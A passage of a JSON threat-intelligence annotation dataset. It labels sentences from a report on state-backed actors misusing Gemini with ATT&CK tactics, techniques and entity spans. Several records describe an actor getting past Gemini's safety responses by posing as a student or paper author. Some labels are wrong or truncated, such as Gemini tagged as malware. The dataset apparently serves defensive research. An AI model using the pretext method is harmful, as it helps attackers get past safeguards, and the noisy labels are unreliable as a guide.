"label": "ThreatActor" }, { "text": "MUDDYCOAST, Muddy Water", "start": 58, "end": 81, "label": "ThreatActor" }, { "text": "Gemini ", "start": 88, "end": 95, "label": "MalwareTool" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s53-032a7e", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 53, "context_before": "The Iranian state-sponsored threat actor TEMP.Zagros (aka MUDDYCOAST, Muddy Water)\nused Gemini to conduct research to support the development of custom malware, an evolution in the group’s capability.", "sentence_text": "They continue to rely on phishing emails, often using compromised corporate email accounts from victims to lend credibility to their attacks, but have shifted from using public tools to developing custom malware including web shells and a Python-based C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "The actor shifted from public tools to developing custom malware (web shells, Python C2) but still uses phishing with compromised corporate emails", "entities": [ { "text": "phishing emails", "start": 25, "end": 40, "label": "MalwareTool" }, { "text": "custom malware", "start": 197, "end": 211, "label": "MalwareTool" }, { "text": "web shells", "start": 222, "end": 232, "label": "MalwareTool" }, { "text": "compromised corporate email", "start": 54, "end": 81, "label": "Action" }, { "text": "Python-based C2 server", "start": 239, "end": 261, "label": "Infrastructure_Indicator" }, { "text": "rely on phishing emails", "start": 17, "end": 40, "label": "Action" }, { "text": "developing custom malware", "start": 186, "end": 211, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s54-50d3be", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 54, "context_before": "They continue to rely on phishing emails, often using compromised corporate email accounts from victims to lend credibility to their attacks, but have shifted from using public tools to developing custom malware including web shells and a Python-based C2 server.", "sentence_text": "While using Gemini to conduct research to support the development of custom malware, the threat actor encountered safety responses.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "The threat actor used Gemini for malware research but encountered safety responses from the AI", "entities": [ { "text": "conduct research to support the development of custom malware", "start": 22, "end": 83, "label": "Action" }, { "text": "custom malware", "start": 69, "end": 83, "label": "MalwareTool" }, { "text": "Gemini", "start": 12, "end": 18, "label": "MalwareTool" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s55-7b6196", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 55, "context_before": "While using Gemini to conduct research to support the development of custom malware, the threat actor encountered safety responses.", "sentence_text": "Much like the previously described CTF example, Temp.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s56-a07d81", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 56, "context_before": "Much like the previously described CTF example, Temp.", "sentence_text": "Zagros used various plausible pretexts in their prompts to bypass security guardrails.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Zagros bypassed AI security guardrails.", "entities": [ { "text": "Zagros", "start": 0, "end": 6, "label": "ThreatActor" }, { "text": "bypass security guardrails", "start": 59, "end": 85, "label": "Action" }, { "text": " used", "start": 6, "end": 11, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s57-e82edb", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 57, "context_before": "Zagros used various plausible pretexts in their prompts to bypass security guardrails.", "sentence_text": "These included pretending to be a student working on a final university project or \"writing a paper\" or \"international article\" on cybersecurity.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1596", "name": "Search Open Technical Databases" } ], "procedure": "The actor pretended to be a student or researcher to bypass security", "entities": [ { "text": "pretending to be a student working", "start": 15, "end": 49, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s58-3a7327", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 58, "context_before": "These included pretending to be a student working on a final university project or \"writing a paper\" or \"international article\" on cybersecurity.", "sentence_text": "This revealed sensitive, hard-coded information to Gemini, including the C2 domain and the script’s encryption key, facilitating our broader disruption of the attacker’s campaign and providing a direct window into their evolving operational capabilities and infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s59-de719a", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 59, "context_before": "This revealed sensitive, hard-coded information to Gemini, including the C2 domain and the script’s encryption key, facilitating our broader disruption of the attacker’s campaign and providing a direct window into their evolving operational capabilities and infrastructure.", "sentence_text": "Purpose-Built Tools and Services for Sale in Underground Forums", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Selling purpose-built tools and services in underground forums", "entities": [ { "text": "Purpose-Built Tools and Services", "start": 0, "end": 32, "label": "MalwareTool" }, { "text": "Underground Forums", "start": 45, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "Sale", "start": 37, "end": 41, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s60-fb662b", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 60, "context_before": "Purpose-Built Tools and Services for Sale in Underground Forums", "sentence_text": "In addition to misusing existing AI-enabled tools and services across the industry, there is a growing interest and marketplace for AI tools and services purpose-built to enable illicit activities.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Growing marketplace for AI tools purpose-built for illicit activities, in addition to the misuse of existing ones", "entities": [ { "text": "AI-enabled tools and services ", "start": 33, "end": 63, "label": "MalwareTool" }, { "text": "AI tools and services", "start": 132, "end": 153, "label": "MalwareTool" }, { "text": "misusing existing AI-enabled tools and services ", "start": 15, "end": 63, "label": "Action" }, { "text": "enable illicit activities", "start": 171, "end": 196, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s61-ce5f4a", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 61, "context_before": "In addition to misusing existing AI-enabled tools and services across the industry, there is a growing interest and marketplace for AI tools and services purpose-built to enable illicit activities.", "sentence_text": "To identify evolving threats, GTIG tracks posts and advertisements on English- and Russian-language underground forums related to AI tools and services as well as discussions surrounding the technology.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s62-435049", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 62, "context_before": "To identify evolving threats, GTIG tracks posts and advertisements on English- and Russian-language underground forums related to AI tools and services as well as discussions surrounding the technology.", "sentence_text": "Many underground forum advertisements mirrored language comparable to traditional marketing of legitimate AI models, citing the need to improve the efficiency of workflows and effort while simultaneously offering guidance for prospective customers interested in their offerings.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s63-d78412", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 63, "context_before": "Many underground forum advertisements mirrored language comparable to traditional marketing of legitimate AI models, citing the need to improve the efficiency of workflows and effort while simultaneously offering guidance for prospective customers interested in their offerings.", "sentence_text": "In 2025 the cyber crime marketplace for AI-enabled tooling matured, and GTIG identified multiple offerings for multifunctional tools designed to support stages of the attack lifecycle.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s64-26793a", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 64, "context_before": "In 2025 the cyber crime marketplace for AI-enabled tooling matured, and GTIG identified multiple offerings for multifunctional tools designed to support stages of the attack lifecycle.", "sentence_text": "Of note, almost every notable tool advertised in underground forums mentioned their ability to support phishing campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s65-6874ad", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 65, "context_before": "Of note, almost every notable tool advertised in underground forums mentioned their ability to support phishing campaigns.", "sentence_text": "Underground advertisements indicate many AI tools and services promoted similar technical capabilities to support threat operations as those of conventional tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s66-c2d2d8", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 66, "context_before": "Underground advertisements indicate many AI tools and services promoted similar technical capabilities to support threat operations as those of conventional tools.", "sentence_text": "GTIG assesses that financially motivated threat actors and others operating in the underground community will continue to augment their operations with AI tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s67-d19ec2", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 67, "context_before": "GTIG assesses that financially motivated threat actors and others operating in the underground community will continue to augment their operations with AI tools.", "sentence_text": "Continued Augmentation of the Full Attack Lifecycle State-sponsored actors from North Korea, Iran, and the People's Republic of China (PRC) continue to misuse generative AI tools including Gemini to enhance all stages of their operations, from reconnaissance and phishing lure creation to C2 development and data exfiltration.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "State-sponsored actors misuse generative AI tools to support attack operations, including phishing lure creation.", "entities": [ { "text": "State-sponsored actors from North Korea, Iran, and the People's Republic of China (PRC)", "start": 52, "end": 139, "label": "ThreatActor" }, { "text": "Gemini", "start": 189, "end": 195, "label": "MalwareTool" }, { "text": "misuse generative AI tools", "start": 152, "end": 178, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s68-80c410", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 68, "context_before": "Continued Augmentation of the Full Attack Lifecycle State-sponsored actors from North Korea, Iran, and the People's Republic of China (PRC) continue to misuse generative AI tools including Gemini to enhance all stages of their operations, from reconnaissance and phishing lure creation to C2 development and data exfiltration.", "sentence_text": "This extends one of our core findings from our January 2025 analysis Adversarial Misuse of Generative AI Expanding Knowledge of Less Conventional Attack Surfaces GTIG observed a suspected China-nexus actor leveraging Gemini for multiple stages of an intrusion campaign, conducting initial reconnaissance on targets of interest, researching phishing techniques to deliver payloads, soliciting assistance from Gemini related to lateral movement, seeking technical support for C2 efforts once inside a victim’s system, and leveraging help for data exfiltration.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Leveraging Gemini for reconnaissance, phishing research, lateral movement, C2 development, and data exfiltration", "entities": [ { "text": " China-nexus actor ", "start": 187, "end": 206, "label": "ThreatActor" }, { "text": " leveraging", "start": 205, "end": 216, "label": "Action" }, { "text": "conducting initial reconnaissance on targets of interest", "start": 270, "end": 326, "label": "Action" }, { "text": "researching phishing techniques", "start": 328, "end": 359, "label": "Action" }, { "text": "seeking technical support for C2 efforts", "start": 444, "end": 484, "label": "Action" }, { "text": "leveraging help for data exfiltration", "start": 520, "end": 557, "label": "Action" }, { "text": " Gemini ", "start": 216, "end": 224, "label": "MalwareTool" }, { "text": "victim’s system", "start": 499, "end": 514, "label": "Infrastructure_Indicator" }, { "text": "soliciting assistance", "start": 381, "end": 402, "label": "Action" }, { "text": "Gemini", "start": 408, "end": 414, "label": "MalwareTool" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s69-a690d8", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 69, "context_before": "This extends one of our core findings from our January 2025 analysis Adversarial Misuse of Generative AI Expanding Knowledge of Less Conventional Attack Surfaces GTIG observed a suspected China-nexus actor leveraging Gemini for multiple stages of an intrusion campaign, conducting initial reconnaissance on targets of interest, researching phishing techniques to deliver payloads, soliciting assistance from Gemini related to lateral movement, seeking technical support for C2 efforts once inside a victim’s system, and leveraging help for data exfiltration.", "sentence_text": "The threat actor demonstrated access to AWS tokens for EC2 (Elastic Compute Cloud) instances and used Gemini to research how to use the temporary session tokens, presumably to facilitate deeper access or data theft from a victim environment.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Used Gemini to research how to exploit AWS EC2 session tokens", "entities": [ { "text": "research how to use the temporary session tokens", "start": 112, "end": 160, "label": "Action" }, { "text": "facilitate deeper access or data thef", "start": 176, "end": 213, "label": "Action" }, { "text": "AWS tokens for EC2 (Elastic Compute Cloud)", "start": 40, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "Gemini", "start": 102, "end": 108, "label": "MalwareTool" }, { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s70-aa3e5a", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 70, "context_before": "The threat actor demonstrated access to AWS tokens for EC2 (Elastic Compute Cloud) instances and used Gemini to research how to use the temporary session tokens, presumably to facilitate deeper access or data theft from a victim environment.", "sentence_text": "In another case, the actor leaned on Gemini to assist in identifying Kubernetes systems and to generate commands for enumerating containers and pods.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1046", "name": "Network Service Discovery" } ], "procedure": "Used Gemini to identify Kubernetes systems and generate enumeration commands", "entities": [ { "text": "generate commands", "start": 95, "end": 112, "label": "Action" }, { "text": "Kubernetes systems", "start": 69, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "Gemini ", "start": 37, "end": 44, "label": "MalwareTool" }, { "text": " enumerating", "start": 116, "end": 128, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s71-54f4c5", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 71, "context_before": "In another case, the actor leaned on Gemini to assist in identifying Kubernetes systems and to generate commands for enumerating containers and pods.", "sentence_text": "We also observed research into getting host permissions on MacOS, indicating a threat actor focus on phishing techniques for that system.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Researching phishing techniques to gain host permissions on MacOS", "entities": [ { "text": " research into getting host permissions", "start": 16, "end": 55, "label": "Action" }, { "text": "MacOS", "start": 59, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "phishing ", "start": 101, "end": 110, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s72-ed00ab", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 72, "context_before": "We also observed research into getting host permissions on MacOS, indicating a threat actor focus on phishing techniques for that system.", "sentence_text": "North Korean Threat Actors Misuse Gemini", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Misusing the Gemini AI tool", "entities": [ { "text": "North Korean Threat Actors ", "start": 0, "end": 27, "label": "ThreatActor" }, { "text": "Gemini", "start": 34, "end": 40, "label": "MalwareTool" }, { "text": "Misuse", "start": 27, "end": 33, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s73-96f4f3", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 73, "context_before": "North Korean Threat Actors Misuse Gemini", "sentence_text": "Across the Attack Lifecycle Threat actors associated with the Democratic People's Republic of Korea (DPRK) continue to misuse generative AI tools to support operations across the stages of the attack lifecycle, aligned with their efforts to target cryptocurrency and provide financial support to the regime.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Misusing generative AI tools to support operations across the attack lifecycle", "entities": [ { "text": "continue to misuse generative AI tools", "start": 107, "end": 145, "label": "Action" }, { "text": "generative AI tools", "start": 126, "end": 145, "label": "MalwareTool" }, { "text": "Threat actors associated with the Democratic People's Republic of Korea (DPRK)", "start": 28, "end": 106, "label": "ThreatActor" }, { "text": "support operations", "start": 149, "end": 167, "label": "Action" }, { "text": " target cryptocurrency ", "start": 240, "end": 263, "label": "Action" }, { "text": " provide financial support", "start": 266, "end": 292, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s74-c5572d", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 74, "context_before": "Across the Attack Lifecycle Threat actors associated with the Democratic People's Republic of Korea (DPRK) continue to misuse generative AI tools to support operations across the stages of the attack lifecycle, aligned with their efforts to target cryptocurrency and provide financial support to the regime.", "sentence_text": "This North Korean threat actor is known to conduct cryptocurrency theft campaigns leveraging social engineering, notably using language related to computer maintenance and credential harvesting.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Conducts cryptocurrency theft using social engineering", "entities": [ { "text": "North Korean threat", "start": 5, "end": 24, "label": "ThreatActor" }, { "text": "conduct cryptocurrency theft campaigns", "start": 43, "end": 81, "label": "Action" }, { "text": "leveraging social engineering", "start": 82, "end": 111, "label": "Action" }, { "text": "using", "start": 121, "end": 126, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s75-97e801", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 75, "context_before": "This North Korean threat actor is known to conduct cryptocurrency theft campaigns leveraging social engineering, notably using language related to computer maintenance and credential harvesting.", "sentence_text": "The threat actor also generated lure material and other messaging related to cryptocurrency, likely to support social engineering efforts for malicious activity.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Generated lure material related to cryptocurrency", "entities": [ { "text": " generated lure material and other messaging", "start": 21, "end": 65, "label": "Action" }, { "text": " threat actor", "start": 3, "end": 16, "label": "ThreatActor" }, { "text": " malicious activity", "start": 141, "end": 160, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s76-17b9cc", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 76, "context_before": "The threat actor also generated lure material and other messaging related to cryptocurrency, likely to support social engineering efforts for malicious activity.", "sentence_text": "This included generating Spanish-language work-related excuses and requests to reschedule meetings, demonstrating how threat actors can overcome the barriers of language fluency to expand the scope of their targeting and success of their campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Generated Spanish-language excuses and requests", "entities": [ { "text": "generating Spanish-language work-related excuses and requests", "start": 14, "end": 75, "label": "Action" }, { "text": " to reschedule meetings", "start": 75, "end": 98, "label": "Action" }, { "text": "threat actors ", "start": 118, "end": 132, "label": "ThreatActor" }, { "text": "overcome the barriers ", "start": 136, "end": 158, "label": "Action" }, { "text": "expand", "start": 181, "end": 187, "label": "Action" }, { "text": " targeting", "start": 206, "end": 216, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s77-14838b", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 77, "context_before": "This included generating Spanish-language work-related excuses and requests to reschedule meetings, demonstrating how threat actors can overcome the barriers of language fluency to expand the scope of their targeting and success of their campaigns.", "sentence_text": "We have disabled this account.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s78-215ce3", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 78, "context_before": "We have disabled this account.", "sentence_text": "Using Deepfakes\nBeyond UNC1069’s misuse of Gemini, GTIG recently observed the group leverage deepfake images and video lures impersonating individuals in the cryptocurrency industry as part of social engineering campaigns to distribute its BIGMACHO backdoor to victim systems.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Leveraged deepfake lures to distribute BIGMACHO backdoor", "entities": [ { "text": "UNC1069", "start": 23, "end": 30, "label": "ThreatActor" }, { "text": "BIGMACHO backdoor", "start": 240, "end": 257, "label": "MalwareTool" }, { "text": "Deepfakes", "start": 6, "end": 15, "label": "MalwareTool" }, { "text": "victim systems", "start": 261, "end": 275, "label": "Infrastructure_Indicator" }, { "text": "leverage deepfake images and video", "start": 84, "end": 118, "label": "Action" }, { "text": "lures impersonating individuals", "start": 119, "end": 150, "label": "Action" }, { "text": "distribute its BIGMACHO backdoor", "start": 225, "end": 257, "label": "Action" }, { "text": "deepfake", "start": 93, "end": 101, "label": "MalwareTool" }, { "text": " Gemini", "start": 42, "end": 49, "label": "MalwareTool" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s79-757ee1", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 79, "context_before": "Using Deepfakes\nBeyond UNC1069’s misuse of Gemini, GTIG recently observed the group leverage deepfake images and video lures impersonating individuals in the cryptocurrency industry as part of social engineering campaigns to distribute its BIGMACHO backdoor to victim systems.", "sentence_text": "The campaign prompted targets to download and install a malicious \"Zoom SDK\" link.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Prompted targets to download and install malicious Zoom SDK", "entities": [ { "text": "malicious \"Zoom SDK\" link", "start": 56, "end": 81, "label": "MalwareTool" }, { "text": " prompted targets to download and install a malicious \"Zoom SDK\" link.", "start": 12, "end": 82, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s80-09a2dd", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 80, "context_before": "The campaign prompted targets to download and install a malicious \"Zoom SDK\" link.", "sentence_text": "Attempting to Develop Novel Capabilities with AI UNC4899 (aka PUKCHONG), a North Korean threat actor notable for their use of supply chain compromise, used Gemini for a variety of purposes including developing code, researching exploits, and improving their tooling.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" }, { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Used Gemini for developing code, researching exploits, and improving tooling", "entities": [ { "text": "UNC4899 (aka PUKCHONG), a North Korean threat actor ", "start": 49, "end": 101, "label": "ThreatActor" }, { "text": "Gemini", "start": 156, "end": 162, "label": "MalwareTool" }, { "text": "code", "start": 210, "end": 214, "label": "MalwareTool" }, { "text": "exploits,", "start": 228, "end": 237, "label": "MalwareTool" }, { "text": "tooling", "start": 258, "end": 265, "label": "MalwareTool" }, { "text": "used Gemini", "start": 151, "end": 162, "label": "Action" }, { "text": "developing code, researching exploits, and improving their tooling", "start": 199, "end": 265, "label": "Action" }, { "text": " use of supply chain compromise", "start": 118, "end": 149, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s81-b72399", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 81, "context_before": "Attempting to Develop Novel Capabilities with AI UNC4899 (aka PUKCHONG), a North Korean threat actor notable for their use of supply chain compromise, used Gemini for a variety of purposes including developing code, researching exploits, and improving their tooling.", "sentence_text": "The research into vulnerabilities and exploit development likely indicates the group is developing capabilities to target edge devices and modern browsers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s82-f214bd", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 82, "context_before": "The research into vulnerabilities and exploit development likely indicates the group is developing capabilities to target edge devices and modern browsers.", "sentence_text": "We have disabled the threat actor’s accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s83-d01b29", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 83, "context_before": "We have disabled the threat actor’s accounts.", "sentence_text": "Capture-the-Data: Attempts to Develop a “Data Processing Agent” The use of Gemini by APT42, an Iranian government-backed attacker, reflects the group's focus on crafting successful phishing campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Using Gemini to craft successful phishing campaigns", "entities": [ { "text": "APT42, an Iranian government-backed attacker", "start": 85, "end": 129, "label": "ThreatActor" }, { "text": " reflects the group's focus on crafting successful phishing campaigns", "start": 130, "end": 199, "label": "Action" }, { "text": "Gemini", "start": 75, "end": 81, "label": "MalwareTool" }, { "text": "Data Processing Agen", "start": 41, "end": 61, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s84-127057", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 84, "context_before": "Capture-the-Data: Attempts to Develop a “Data Processing Agent” The use of Gemini by APT42, an Iranian government-backed attacker, reflects the group's focus on crafting successful phishing campaigns.", "sentence_text": "In recent activity, APT42 used the text generation and editing capabilities of Gemini to craft material for phishing campaigns, often impersonating individuals from reputable organizations such as prominent think tanks and using lures related to security technology, event invitations, or geopolitical discussions.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Used Gemini to craft material for phishing campaigns", "entities": [ { "text": "APT42", "start": 20, "end": 25, "label": "ThreatActor" }, { "text": "Gemini ", "start": 79, "end": 86, "label": "MalwareTool" }, { "text": "used the text generation and editing capabilities of Gemini to craft material for phishing campaigns", "start": 26, "end": 126, "label": "Action" }, { "text": "using lures", "start": 223, "end": 234, "label": "Action" }, { "text": "impersonating individuals", "start": 134, "end": 159, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s85-506f0f", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 85, "context_before": "In recent activity, APT42 used the text generation and editing capabilities of Gemini to craft material for phishing campaigns, often impersonating individuals from reputable organizations such as prominent think tanks and using lures related to security technology, event invitations, or geopolitical discussions.", "sentence_text": "APT42 also attempted to build a “Data Processing Agent”, misusing Gemini to develop and test the tool.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Attempted to build a \"Data Processing Agent\" by misusing Gemini for development and testing", "entities": [ { "text": "APT42", "start": 0, "end": 5, "label": "ThreatActor" }, { "text": " attempted to build a “Data Processing Agent”", "start": 10, "end": 55, "label": "Action" }, { "text": "misusing", "start": 57, "end": 65, "label": "Action" }, { "text": "develop", "start": 76, "end": 83, "label": "Action" }, { "text": "test", "start": 88, "end": 92, "label": "Action" }, { "text": "“Data Processing Agent”", "start": 32, "end": 55, "label": "MalwareTool" }, { "text": " Gemini", "start": 65, "end": 72, "label": "MalwareTool" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s86-1d2fb2", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 86, "context_before": "APT42 also attempted to build a “Data Processing Agent”, misusing Gemini to develop and test the tool.", "sentence_text": "The agent converts natural language requests into SQL queries to derive insights from sensitive personal data.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1213", "name": "Data from Information Repositories" } ], "procedure": "Converts natural language to SQL queries to analyze data", "entities": [ { "text": "converts natural language requests into SQL queries ", "start": 10, "end": 62, "label": "Action" }, { "text": "derive insights from sensitive personal data", "start": 65, "end": 109, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s87-6e26b1", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 87, "context_before": "The agent converts natural language requests into SQL queries to derive insights from sensitive personal data.", "sentence_text": "We have disabled the threat actors’ accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s88-ba7ccf", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 88, "context_before": "We have disabled the threat actors’ accounts.", "sentence_text": "Code Development: C2 Development and Support for Obfuscation Threat actors continue to adapt generative AI tools to augment their ongoing activities, attempting to enhance their tactics, techniques, and procedures (TTPs) to move faster and at higher volume.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Adapt generative AI tools to augment ongoing activities", "entities": [ { "text": "generative AI tools", "start": 93, "end": 112, "label": "MalwareTool" }, { "text": "augment their ongoing activities", "start": 116, "end": 148, "label": "Action" }, { "text": " enhance their tactics", "start": 163, "end": 185, "label": "Action" }, { "text": "C2 Development", "start": 18, "end": 32, "label": "Infrastructure_Indicator" }, { "text": "continue to adapt", "start": 75, "end": 92, "label": "Action" }, { "text": " Obfuscation Threat actors", "start": 48, "end": 74, "label": "ThreatActor" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s89-d50f84", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 89, "context_before": "Code Development: C2 Development and Support for Obfuscation Threat actors continue to adapt generative AI tools to augment their ongoing activities, attempting to enhance their tactics, techniques, and procedures (TTPs) to move faster and at higher volume.", "sentence_text": "The group has demonstrated a history of targeting a range of operating systems across mobile and desktop devices as well as employing social engineering compromises for their operations.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": 